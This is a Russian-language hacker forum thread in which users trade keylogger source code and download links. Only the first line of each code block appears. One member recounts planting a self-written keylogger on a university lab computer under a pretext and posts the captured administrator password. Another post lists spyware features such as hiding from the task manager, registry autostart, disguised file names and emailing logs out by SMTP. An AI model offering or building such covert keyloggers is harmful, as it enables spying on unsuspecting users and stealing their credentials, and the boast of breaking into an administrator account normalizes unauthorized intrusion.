![]() |
Клавиатурный шпион
Вот исходничек простенького клавиатурника! К основным его преемуществам могу отнести то что он очень мал для проги такого класса (19кб),что кстати ломает убеждение о грамоздкости Делфи прог, и занимает мало места в оперативке (обычно 1-1,5мб)!
Программа абсолютно безопастная и предназдначенна только для изучения! Но я не сомневаюсь в том что это может стать составной частью PSW-trojan! Но это ваше дело.... Вот код: Код:
program ntrty; |
Прикольно. Проверил работает на ура.
|
Поскольку тема достаточно актуальна для новичков в программировании, предлагаю скидывать сюда исходники различных кейлоггеров. Тему прикрепляю
|
ы, улыбнул , ну вот , для совсем новичнов (где-то в раритетах специально ради такого откопал),
даже язык Билли рулит ))) ...Мегахардкорная штука... Код:
Private Declare Function Getasynckeystate Lib "user32" Alias "GetAsyncKeyState" (ByVal VKEY As Long) As Integer |
|
По тому же принципу, что показал Jes. И на том же языке
Статья: Кейлогер на Vb или как правильно играть в Gta!!! |
А на C# можно шпиона создать
|
можна
|
Цитата:
Гг...я эти исходники заодно в електроном виде сохраню на флеху в виде Контрольной по Комп.технологиям :D |
и тут, как раз у меня завалялся у меня еще один обучающий "раритет" )
Код:
// KeyLogger на С# через GetAsyncKeyState |
Привет товарищи вопрос такой написал простенький keylogger при вводе текста ловит только в своё окно а из других типа блокнота не ловит пробовал получать handle активного вданный момент окна и подключится к активному окну неполучилось Что я делаю не так? Помогите пожалуйта
HookProc и SetWindowsHookEx оформил в длл код Длл: Код:
#include "stdafx.h" |
Кей Логгер на C# через Hook ...
гыгыгы Код:
using System;Я собрал код так, чтобы для его запуска достаточно его только скопировать(From1.cs);(ибо топ для новичков) |
по поводу первого поста
Я хотел узнать вот первый кейлогер который выложили он у меня не работает , пишет ошибки постоянные , gold-goblin можеш выложить тот , что у тебя пошел ?
|
Помог самописный Кейлогер
Полторы недели назад начался новый семестр. Как ни странно я уже ждал этого момента, так как у нас постоянно что-то колотили в универе, прокладывали какие-то кабеля. Прошел слух что у нас собираются проводить сеть, причем интернет теперь сделают халявним для учащихся, но правда с невысокой скоростью. Потирая ладони я почувствовал, что вот оно-счастье! И что вы думаете? Да...бесплатный сыр только в мышеловке бывает...Мало того что не появилось этого халявного инета, дак еще и доступы везде поограничевали. Вот вам по 200 мб на каждом компе и как хотите! Конечно же доступ у админов был полным. Такая идея мне очень не понравилась, я решил во что бы то не стало получить доступ к адинистратору. Первое что я попробовал - это конечно же стащить SAM но вот облом - системник весь в пломбах и на биосе пароль!:( Дам..ну да ладно. Увлекшись этой мыслю, стал перебирать в голове различные варианты, и....А что если старым добрым способом: кейлоггинг? Благо в инете много всяких кейллогов...Придя домой сразу же в инет искать? И вот когда у меня собралось с десяток, стал тестить...Не знаю почему но меня ни один не устроил - почти каждый второй клиент-серверный (оно и понятно), а некоторые вообще только английские клавиши ловят. Короче не то это все и вот взяв один исходничек было решено его подогнать, что называется под себя! И вот парочка деньков и кейллог готов:) Так как в нашей лаборатории сидят в основном то нубы, я зашел туда и сказал: Можно я скину себе последнюю версию Fox'a (они у них полулицензионные=))? - Да пожалуйста. Далее думаю комментария излишни...И тут бац звонок на пару - Ой я потом у Вас докопирую приду позже...
Гы...прихожу через два дня:) Скинул как и обещал. И как Вы думаете?-Получилось!!!!!!!!!!Кейллог, который был настроен у меня определенное окошко, благополучно записал логин и пароль, которые в последствии были проверены и подошли: administrator: h2urra4!. Поэтому выкладываю сюда свое произведение, может кому тоже понравится:) В оставшееся время, написал для него формочку, если не охото копаться в исходниках (прилагаются к кейллогеру). Забавно, но сперва напоминает Pinch. Поэтому назвал Vinchi:) Работает только локально, и никакого вреда для машины не наносит (разве, что записи в реестре:d). Если будут отзывы, можно будет доработать. Кстати весит - 12 кб:) Язык - Delphi Скачать (~700 кб) P.S С сердечком, потому что завтра 14 февраля:) |
Начинаю собирать и находит 2 ошибки. using System.Linq; и HookCallback собирaю в visual studio 2005
|
А Сорцы билдера почему не выложил ? есть ошибки,что-то забыл добавить..или удалил лишнее..:(
|
Все там работает, включаем мозги!!!
|
У меня вопрос. Можно ли весь код Кейлогера(используюя хуки) на Си или на Асм запихнуть в Dll. Чтоб Dll была полностью самостоятельна. С толкнулся с проблемой, когда приложение ставит хук, а функция для отлова клавиш находится в DLL то все работает хорошо. Но когда Dll сама ставит хук, то не фига не работает и ошибок нет. В чем прикол?
|
+ к коллекции:
=============================== Название: Kbd sniffer 1.2 Автор: Del Язык: C++ Компилятор: Borland C++ Builder 5 Описание: Прога для наблюдения за глупыми юзерами:) Записывает в файлик всё, что нажимали на клаве. Для работы сниффера нужно 2 файла: winsock.exe (сниффер) и hook.dll Что бы он начал свою работу просто запустите его. Прога не имеет окна и скрываеться от 3-х педалей, так что сходу её в Виндах не найдёшь. Но при желании конечно найти можно:) При старте сниффер скрывает себя от Ctrl-Alt-Del, прописывает автостарт в реестре HKCR\Sostware\Microsoft\Windows\Current Version\Run - winsock и начинает запись всех нажатых клавишь в C:\Windows\System\gdi32.snf Если папка винды не C:\Windows, а другая, не переживайте - сниффер всё равно её найдёт и запишет лог клавы куда надо. Если надо писать в другое место (например диск C:\ не разшарен) укажите путь к лог файлу в коммандной строке сниффера. Например: winsocket.exe D:\Vasya\klav_log.txt Для того чтобы удалить запись о автозапуске сниффера из реестра, достаточно запустить unistall.exe (идёт в одном архиве со сниферром). Прога написана на C++Builder 5.0 с использованием средств WindowsAPI. Тестировалась в win98se и WinME. Глюков не создавала. Вместе со сниффером поставляеться конвертер его логов. Он выкидывает из логов всё кроме самого текста. Пароли, конечно, так не узнаешь, а просто читать гораздо приятнее:) [Скачать] =============================== Название: KidLogger Автор: Teslain Язык: C++ Компилятор: VisualC++ 6.0 Описание: Teslain Kid logger (v. 1.0 with source code). Log your kid activity on the computer. Designed for Home users to keep watch on kids (2-7 years) activity. This programm to not containt spyware/adware modules. This is simple key logger that do not protect himself from being deleted by user. [Скачать] =============================== Название: keyhook Автор: ? Язык: С++ Компилятор: Visual Studio Описание: +Простой кейлог с названием окна и нажатых клавиш. +Копирует себя в директорию с WindowsMediaPlayer(Сам придумал для беспаливности) +Загружаеться через userinit +Шлет лог каждые n байт в сорце поставил 1100(отправка smtp на сокетах,к сожалению без фильтрации ошибок) Написан на С++ чистом ВинАпи. [Скачать] =============================== Название: SpySystem Автор: ? Язык: C++ Компилятор: VisualC++ 6.0 Описание: Программа ведет два лог файла: 1-й кейлог(пишет все нажатия клавиш) 2-й буфферлог(пишет лог всякий раз,когда в буфере обмена появляется текст) При запуске прописывается в автозапуск! висит в трее. О настройках: SpySystem.ini PathBuf-прописать полный путь до папки куда хотим вести лог буффера обмена. PathKey-прописать полный путь до папки куда хотим вести лог кейлогера. [Скачать] =============================== |
Может кто-нибудь выложить готовый простенький кейлоггер, который бы писал всё в .txt рядом, автозапуск можно и самому прописать... заранее спасибо
|
http://forum.antichat.ru/showpost.php?p=383033&postcount=1
|
у меня нет делфи
|
Тут :D
|
| Время: 12:35 |